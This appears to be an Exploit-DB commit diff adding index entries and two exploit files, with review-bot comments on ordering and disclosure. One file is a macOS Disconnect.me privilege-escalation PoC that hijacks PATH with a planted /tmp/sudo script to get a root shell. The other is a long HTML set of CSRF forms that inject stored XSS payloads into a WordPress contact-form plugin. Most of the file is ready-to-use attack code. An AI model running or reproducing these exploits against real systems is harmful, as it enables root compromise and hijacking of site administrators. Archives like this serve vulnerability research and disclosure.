DB: 2015-09-07

6 new exploits
Offensive Security 2015-09-07 05:02:07 +00:00
parent a15ab9b097
commit 488f57ec93
8 changed files with 1239 additions and 601 deletions


@ -34384,7 +34384,13 @@ id,file,description,date,author,platform,type,port
38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21 38072,platforms/windows/dos/38072.py,"SphereFTP Server 2.0 - Crash PoC",2015-09-02,"Meisam Monsef",windows,dos,21
38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80 38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - CSRF Command Execution Vulnerability",2015-09-02,"Phan Thanh Duy",hardware,webapps,80
38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80 38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - CSRF Vulnerability",2015-09-02,"High-Tech Bridge SA",php,webapps,80
38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,zedsec390,system_z,shellcode,0 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z Bind Shell",2015-09-02,"Bigendian Smalls",system_z,shellcode,0
38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator <= 2.0.1 - Multiple CSRF Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80
38076,platforms/php/webapps/38076.txt,"BigDump Cross Site Scripting_ SQL Injection_ and Arbitrary File Upload Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0 38076,platforms/php/webapps/38076.txt,"BigDump Cross Site Scripting_ SQL Injection_ and Arbitrary File Upload Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0
38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme 'mls' Parameter SQL Injection Vulnerability",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0
38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0 38078,platforms/php/webapps/38078.py,"Elastix 'page' Parameter Cross Site Scripting Vulnerability",2012-11-29,cheki,php,webapps,0
38085,platforms/win64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win64,dos,0
38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0
38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client <= 2.0 - Local Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0
38090,platforms/php/webapps/38090.txt,"FireEye Appliance Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443
38091,platforms/php/webapps/38091.php,"Elastix < 2.5 _ PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0
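Review bot: entry 38086 (WordPress Contact Form Generator) is inserted between 38075 and 38076 rather than in id order with the other 2015-09-06 additions (38085, 38087, 38089, 38090, 38091); move it after 38085 so files.csv stays sorted by id. The 38075 line also changes its author field from zedsec390 to "Bigendian Smalls", which is a metadata correction rather than one of the "6 new exploits" and deserves a mention in the commit message. Finally, the 38091 description carries a bare underscore ("Elastix < 2.5 _ PHP Code Injection Exploit") where a separator was evidently replaced, matching the "_" substitutions in 38076; if that is the house convention for commas and pipes in the description column it should be consistent, otherwise use a plain hyphen.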


platforms/osx/local/38089.txt Executable file

@ -0,0 +1,30 @@
Disconnect.me is the search engine entrusted by the Tor Browser.
Unfortunately, the Mac OS X client has an LPE to root vulnerability (0day).
Original Download <= v2.0: https://disconnect.me/premium/mac
Archived Download: http://d-h.st/LKqG
Disconnect+Desktop.pkg: sha256 = bc94c94c88eb5c138396519ff994ae8efe85899475f44e54f71a6ebc047ce4e7
https://www.virustotal.com/en/file/bc94c94c88eb5c138396519ff994ae8efe85899475f44e54f71a6ebc047ce4e7/analysis/
PoC:
"""
$ id
uid=501(...) gid=20(staff) ...
$ cat /tmp/sudo
#!/bin/bash
/usr/bin/id
/bin/bash
$ chmod +x /tmp/sudo
$ PATH=/tmp "/Library/Application Support/disconnect/stopvpn"
uid=0(root) gid=0(wheel) ...
# /usr/bin/whoami
root
"""
--
Kristian Erik Hermansen (@h3rm4ns3c)
https://www.linkedin.com/in/kristianhermansen
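Review bot: the PoC shows PATH=/tmp making stopvpn execute a planted /tmp/sudo as root, but the write-up never states why that binary runs with root privileges (setuid bit, launchd privileged helper) or what the fix is; add the `ls -l "/Library/Application Support/disconnect/stopvpn"` output as evidence and a one-line mitigation for the vendor (invoke helpers by absolute path and reset PATH before executing anything from a privileged context), since that is what readers assessing exposure need. It is also labelled 0day with no vendor contact or disclosure timeline, unlike the other advisory in this commit; a timeline line would let readers judge whether the archived v2.0 package (sha256 given) is still the shipping build.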

platforms/php/webapps/38086.html Executable file

@ -0,0 +1,667 @@
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update field for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
form field creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
without knowing.
Update form field: when the victim accesses the link, will update information of the form identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
================================
Field form creation [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value=">"<img&#32;src&#61;x>" />
<input type="hidden" name="id&#95;form" value="8" /> <!-- an existing form id value for this element -->
<input type="hidden" name="id&#95;type" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a field" />
</form>
</body>
<!--
================================
Field form update [CSRF PoC]
================================
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=fields" method="POST">
<input type="hidden" name="name" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="tooltip&#95;text" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="id&#95;form" value="3" /> <!-- an existing form id value -->
<input type="hidden" name="id&#95;type" value="1" />
<input type="hidden" name="column&#95;type" value="0" />
<input type="hidden" name="required" value="0" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="width" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="field&#95;margin&#95;top" value="s"&#32;onmouseover&#61;"alert&#40;&#47;i0&#45;sec&#47;&#41;"&#32;a&#61;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="7" /> <!-- field id to edit -->
<input type="submit" value="Click me for update a field" />
</form>
</body>
</html>
<!--
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
template creation: when the victim accesses the sent link, will create a new form and inject HTML / JS code
without knowing.
Update form: when the victim accesses the link, will update information of the form identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
=========================
Create form [CSRF PoC ]
=========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA&quot;&gt;&lt;img&#32;src&#61;1&gt;&lt;" />
<input type="hidden" name="top&#95;text" value="xds&quot;&gt;&lt;img&#32;src&#61;2&gt;&lt;" />
<input type="hidden" name="pre&#95;text" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;3&gt;&lt;" />
<input type="hidden" name="thank&#95;you&#95;text" value="Message&#32;successfully&#32;sent&quot;&gt;&lt;img&#32;src&#61;4&gt;&lt;" />
<input type="hidden" name="send&#95;text" value="Send&quot;&gt;&lt;img&#32;src&#61;5&gt;&lt;" />
<input type="hidden" name="send&#95;new&#95;text" value="New&#32;email&quot;&gt;&lt;img&#32;src&#61;6&gt;&lt;" />
<input type="hidden" name="close&#95;alert&#95;text" value="Close&quot;&gt;&lt;img&#32;src&#61;7&gt;&lt;" />
<input type="hidden" name="form&#95;width" value="100&#37;&quot;&gt;&lt;img&#32;src&#61;8&gt;&lt;" />
<input type="hidden" name="id&#95;template" value="0" />
<input type="hidden" name="email&#95;to" value="&quot;&gt;&lt;img&#32;src&#61;9&gt;&lt;" />
<input type="hidden" name="email&#95;bcc" value="&quot;&gt;&lt;img&#32;src&#61;10&gt;&lt;" />
<input type="hidden" name="email&#95;subject" value="&quot;&gt;&lt;img&#32;src&#61;11&gt;&lt;" />
<input type="hidden" name="email&#95;from" value="&quot;&gt;&lt;img&#32;src&#61;12&gt;&lt;" />
<input type="hidden" name="email&#95;from&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;13&gt;&lt;" />
<input type="hidden" name="email&#95;replyto" value="&quot;&gt;&lt;img&#32;src&#61;14&gt;&lt;" />
<input type="hidden" name="email&#95;replyto&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;15&gt;&lt;" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect&#95;itemid" value="2&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="redirect&#95;url" value="&quot;&gt;&lt;img&#32;src&#61;16&gt;&lt;" />
<input type="hidden" name="redirect&#95;delay" value="0" />
<input type="hidden" name="send&#95;copy&#95;enable" value="1" />
<input type="hidden" name="send&#95;copy&#95;text" value="Send&#32;me&#32;a&#32;copy&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="shake&#95;count" value="2" />
<input type="hidden" name="shake&#95;distanse" value="10" />
<input type="hidden" name="shake&#95;duration" value="300" />
<input type="hidden" name="email&#95;info&#95;show&#95;referrer" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;ip" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;browser" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;os" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;sc&#95;res" value="1" />
<input type="hidden" name="show&#95;back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom&#95;css" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;21&gt;&lt;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for create a form" />
</form>
</body>
<!--
==========================
Update form [CSRF PoC ]
==========================
payload: "><img src=[x]><
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=forms" method="POST">
<input type="hidden" name="name" value="dsSASA&quot;&gt;&lt;img&#32;src&#61;1&gt;&lt;" />
<input type="hidden" name="top&#95;text" value="xds&quot;&gt;&lt;img&#32;src&#61;2&gt;&lt;" />
<input type="hidden" name="pre&#95;text" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;3&gt;&lt;" />
<input type="hidden" name="thank&#95;you&#95;text" value="Message&#32;successfully&#32;sent&quot;&gt;&lt;img&#32;src&#61;4&gt;&lt;" />
<input type="hidden" name="send&#95;text" value="Send&quot;&gt;&lt;img&#32;src&#61;5&gt;&lt;" />
<input type="hidden" name="send&#95;new&#95;text" value="New&#32;email&quot;&gt;&lt;img&#32;src&#61;6&gt;&lt;" />
<input type="hidden" name="close&#95;alert&#95;text" value="Close&quot;&gt;&lt;img&#32;src&#61;7&gt;&lt;" />
<input type="hidden" name="form&#95;width" value="100&#37;&quot;&gt;&lt;img&#32;src&#61;8&gt;&lt;" />
<input type="hidden" name="id&#95;template" value="0" />
<input type="hidden" name="email&#95;to" value="&quot;&gt;&lt;img&#32;src&#61;9&gt;&lt;" />
<input type="hidden" name="email&#95;bcc" value="&quot;&gt;&lt;img&#32;src&#61;10&gt;&lt;" />
<input type="hidden" name="email&#95;subject" value="&quot;&gt;&lt;img&#32;src&#61;11&gt;&lt;" />
<input type="hidden" name="email&#95;from" value="&quot;&gt;&lt;img&#32;src&#61;12&gt;&lt;" />
<input type="hidden" name="email&#95;from&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;13&gt;&lt;" />
<input type="hidden" name="email&#95;replyto" value="&quot;&gt;&lt;img&#32;src&#61;14&gt;&lt;" />
<input type="hidden" name="email&#95;replyto&#95;name" value="&quot;&gt;&lt;img&#32;src&#61;15&gt;&lt;" />
<input type="hidden" name="redirect" value="0" />
<input type="hidden" name="redirect&#95;itemid" value="2&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="redirect&#95;url" value="&quot;&gt;&lt;img&#32;src&#61;16&gt;&lt;" />
<input type="hidden" name="redirect&#95;delay" value="0" />
<input type="hidden" name="send&#95;copy&#95;enable" value="1" />
<input type="hidden" name="send&#95;copy&#95;text" value="Send&#32;me&#32;a&#32;copy&quot;&gt;&lt;img&#32;src&#61;17&gt;&lt;" />
<input type="hidden" name="shake&#95;count" value="2" />
<input type="hidden" name="shake&#95;distanse" value="10" />
<input type="hidden" name="shake&#95;duration" value="300" />
<input type="hidden" name="email&#95;info&#95;show&#95;referrer" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;ip" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;browser" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;os" value="1" />
<input type="hidden" name="email&#95;info&#95;show&#95;sc&#95;res" value="1" />
<input type="hidden" name="show&#95;back" value="1" />
<input type="hidden" name="published" value="1" />
<input type="hidden" name="custom&#95;css" value="&lt;&#47;textarea&gt;&quot;&gt;&lt;img&#32;src&#61;21&gt;&lt;" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for edit form" />
</form>
</body>
</html>
<!--
===========
TIMELINE
===========
2015-09-02: vulnerability found
2015-09-04: Reported to vendor
2015-09-04: Full disclosure
-->
<html>
<!--
# Exploit Title: WordPress Contact Form Generator v2.0.1 and below (create/update template for contact form) CSRF and Persistent issue
# Date: 2015-09-04
# Google Dork: Index of /wp-content/plugins/contact-form-generator/
# Exploit Author: Joaquin Ramirez Martinez [ i0akiN SEC-LABORATORY ]
# Vendor Homepage: http://creative-solutions.net/
# plugin uri: http://creative-solutions.net/wordpress/contact-form-generator/
# Software Link: https://downloads.wordpress.org/plugin/contact-form-generator.zip
# Version: 2.0.1
# Tested on: windows 10 + firefox.
======================
Description (plugin)
======================
Contact Form Generator is a powerful contact form builder for WordPress! See <a href="http://creative-solutions.net/wordpress/contact-
form-generator/demo">Live Demos</a>. It is packed with a <a href="http://creative-solutions.net/wordpress/contact-form-generator/
template-creator-demo">Template Creator Wizard</a> to create fantastic forms in a matter of seconds without coding.
(copy of ´contactformgenerator.php´ file)
===================
TECHNICAL DETAILS
===================
A CSRF issue was found in the latest version of the plugin for wordpress 'Contact Form Generator'.
The issue can be exploited by sending a special link to a wordpress administrator having installed the vulnerable plugin.
template creation: when the victim accesses the sent link, will create a new template and inject HTML / JS code
without knowing.
Update template: when the victim accesses the link, will update information of the template identified for ´id´
parameter by injecting HTML / JS code.
-->
<!--
==============================
create a template [CSRF PoC ]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value="xsa&quot;&gt;&lt;img&#32;src&#61;x&gt;" /> <!-- persistent form name [XSS] -->
<input type="hidden" name="published" value="1" />
<input type="hidden" name="task" value="save" />
<input type="hidden" name="id" value="0" />
<input type="submit" value="Click me for add new template" />
</form>
</body>
<!--
==============================
edit a template [CSRF PoC ]
==============================
payload: "><img src=x>
-->
<body>
<form action="http://localhost/wordpress2/wp-admin/admin.php?page=cfg_forms&act=cfg_submit_data&holder=templates" method="POST">
<input type="hidden" name="name" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;587&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;588&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;131&#93;" value="inherit" />
<input type="hidden" name="styles&#91;589&#93;" value="1" />
<input type="hidden" name="styles&#91;629&#93;" value="dark&#45;thin" />
<input type="hidden" name="styles&#91;630&#93;" value="dark&#45;thin" />
<input type="hidden" name="styles&#91;627&#93;" value="0" />
<input type="hidden" name="styles&#91;0&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;130&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;517&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;518&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;1&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;2&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;3&#93;" value="solid" />
<input type="hidden" name="styles&#91;4&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;5&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;6&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;7&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;8&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;9&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;10&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;11&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;12&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;13&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;14&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;15&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;16&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;17&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;18&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;19&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;600&#93;" value="0" />
<input type="hidden" name="styles&#91;601&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;602&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;603&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;604&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;605&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;606&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;607&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;608&#93;" value="solid" />
<input type="hidden" name="styles&#91;609&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;610&#93;" value="0" />
<input type="hidden" name="styles&#91;611&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;612&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;613&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;614&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;615&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;616&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;617&#93;" value="0" />
<input type="hidden" name="styles&#91;618&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;619&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;620&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;621&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;622&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;623&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;624&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;625&#93;" value="solid" />
<input type="hidden" name="styles&#91;626&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;20&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;21&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;22&#93;" value="normal" />
<input type="hidden" name="styles&#91;23&#93;" value="normal" />
<input type="hidden" name="styles&#91;24&#93;" value="none" />
<input type="hidden" name="styles&#91;25&#93;" value="left" />
<input type="hidden" name="styles&#91;506&#93;" value="inherit" />
<input type="hidden" name="styles&#91;510&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;27&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;28&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;29&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;30&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;190&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;191&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;192&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;502&#93;" value="left" />
<input type="hidden" name="styles&#91;193&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;194&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;195&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;196&#93;" value="solid" />
<input type="hidden" name="styles&#91;197&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;198&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;199&#93;" value="normal" />
<input type="hidden" name="styles&#91;200&#93;" value="normal" />
<input type="hidden" name="styles&#91;201&#93;" value="none" />
<input type="hidden" name="styles&#91;202&#93;" value="inherit" />
<input type="hidden" name="styles&#91;511&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;203&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;204&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;205&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;206&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;215&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;216&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;217&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;218&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;31&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;32&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;33&#93;" value="normal" />
<input type="hidden" name="styles&#91;34&#93;" value="normal" />
<input type="hidden" name="styles&#91;35&#93;" value="none" />
<input type="hidden" name="styles&#91;36&#93;" value="left" />
<input type="hidden" name="styles&#91;507&#93;" value="inherit" />
<input type="hidden" name="styles&#91;512&#93;" value="cfg&#95;font&#95;effect&#95;none" />
<input type="hidden" name="styles&#91;37&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;38&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;39&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;40&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;41&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;42&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;43&#93;" value="normal" />
<input type="hidden" name="styles&#91;44&#93;" value="normal" />
<input type="hidden" name="styles&#91;509&#93;" value="inherit" />
<input type="hidden" name="styles&#91;46&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;47&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;48&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;49&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;505&#93;" value="white" />
<input type="hidden" name="styles&#91;508&#93;" value="inherit" />
<input type="hidden" name="styles&#91;132&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;133&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;168&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;519&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;520&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
<input type="hidden" name="styles&#91;500&#93;" value="left" />
<input type="hidden" name="styles&#91;501&#93;" value="left" />
<input type="hidden" name="styles&#91;134&#93;" value="&quot;&gt;&lt;img&#32;src&#61;x&gt;" />
